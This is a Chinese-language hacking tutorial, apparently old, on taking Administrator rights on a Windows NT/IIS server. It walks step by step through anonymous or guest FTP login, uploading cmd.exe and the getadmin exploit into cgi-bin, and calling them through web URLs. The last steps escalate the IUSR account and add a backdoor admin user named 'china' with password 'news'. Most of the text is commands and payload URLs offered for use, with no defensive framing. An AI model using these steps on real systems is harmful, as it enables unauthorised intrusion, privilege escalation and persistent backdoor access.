操作Windows NT的Administrator权限

核心提示： ftp www.xxx.comConnected to www.xxx.com220 ntsvr2 Microsoft FTP Service (Version 3.0).Ntsvr2这个东西暴露了其NETbios名，那么在IIS的背景下，操作Windows NT的Administrato

ftp www.xxx.com
Connected to www.xxx.com
220 ntsvr2 Microsoft FTP Service (Version 3.0).

Ntsvr2这个东西暴露了其NETbios名，那么在IIS的背景下，必然会有一个IUSR_ntsvr2的用户帐号，属于Domain user组，这个帐号我们以后要用来获取Administrator的权限。

User (www.xxx.com:(none)):anonymous

Password：输入 guest@ 或者guest。

对于缺乏网络安全知识的管理员来说，很多人没有将guest帐号禁止，或者没有设置密码。那么guest帐号就是一个可用的正确的用户帐号，虽然只属于Domain guest组。在这种情况下我们就可以进NT server的ftp了。

进去以后，看看目录列表，试试 cd /scripts 或cgi-bin等关键目录，如果运气好，改变目录成功，这时你就有了80%的把握。

把Winnt下的cmd.execopy到cgi-bin，把getadmin和gasys.dll传上去到cgi-bin，然后输入：

http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_ntsvr2

大约十多秒后屏幕显示：

CGI Error

这时有90%的可能是：你已经把IUSR_ntsvr2升级为Administrator，也就是任何访问该web站的人都是管理员。

下面可以add user：

http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:winntsystem32
et.exe%20user%20china%20news%20/add

这样就创建了一个叫china用户，密码是news，然后：

http://www.xxx.com/cgi-bin/getadmin.exe?china

或者

http://www.xxx.com/scripts/tools/getadmin.exe?china

你再用China的帐号登陆，就可以有最大的权限了，也可以用上面的cmd.exe的方法直接修改 如果没有cmd.exe，也可以自己传一个上去到scripts/tools或者cgi-bin目录。